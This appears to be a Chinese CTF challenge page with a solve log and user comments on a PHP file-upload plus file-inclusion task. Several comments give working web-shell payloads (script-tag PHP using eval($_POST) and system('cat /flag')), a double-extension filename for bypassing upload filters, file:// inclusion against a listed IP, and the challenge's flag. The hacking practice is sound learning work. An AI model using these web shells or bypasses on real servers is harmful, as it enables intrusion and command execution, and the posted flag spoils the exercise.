评分(5)
解题动态
1234567nxb 攻破了该题 5小时前
lin666 攻破了该题 9小时前
jhon 攻破了该题 1天前
2021060287 攻破了该题 1天前
椰子 攻破了该题 1天前
暗A166668 攻破了该题 2天前
alizee 攻破了该题 2天前
cl20354 攻破了该题 2天前
姥姥 攻破了该题 2天前
白六真的6 攻破了该题 3天前
ysecer8 攻破了该题 3天前
qwepio 攻破了该题 3天前
baotou91 攻破了该题 3天前
jkljkl 攻破了该题 4天前
jiafeimao 攻破了该题 4天前
你文博哥哥 攻破了该题 4天前
VVang 攻破了该题 4天前
qianye 攻破了该题 4天前
凌晨3点的阳光 攻破了该题 4天前
评论
lin666 9小时前
举报
文件包含 + 文件上传 (使用非主流的内容写法来绕过常规的内容头替换 <script language="php">system("ls");</script> )
2686213396 1月前
举报
http://117.72.52.127:18030/index.php?file=file:///flag,file伪协议说是
satuo 2月前
举报
<script language=php>echo 'a'; eval($_POST['pass']);</script>
zhuizhui 2月前
举报
<script language=php>system("cat /flag")</script> webshell.php;.png
leonleonleon 3月前
举报
1.'<'+'?'+'php' 和'>'会被过滤; 2.后缀名会被过滤; 3.用'<' script lanugage=php 后面自己闭合一下,最后文件包含上传获取flag
shingu 5月前
举报
file=/flag,怎么会这么简单?
volnu1l 7月前
举报
新建txt,保存jpg <script language=php>system("ls /flag&&cat /flag")</script> 访问?file=upload/.jpg
yanqiye 9月前
举报
用file=/flag取巧做法,真正做题名字肯定要变,预期做法:传一句话,发现php标签被删了,直接用<?= @eval($_POST[1]);就可以了。
G3tcH4r 10月前
举报
花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思
迷茫的三千面 10月前
举报
flag{414a91ba57a5e0b5a4eb725b75f5030e}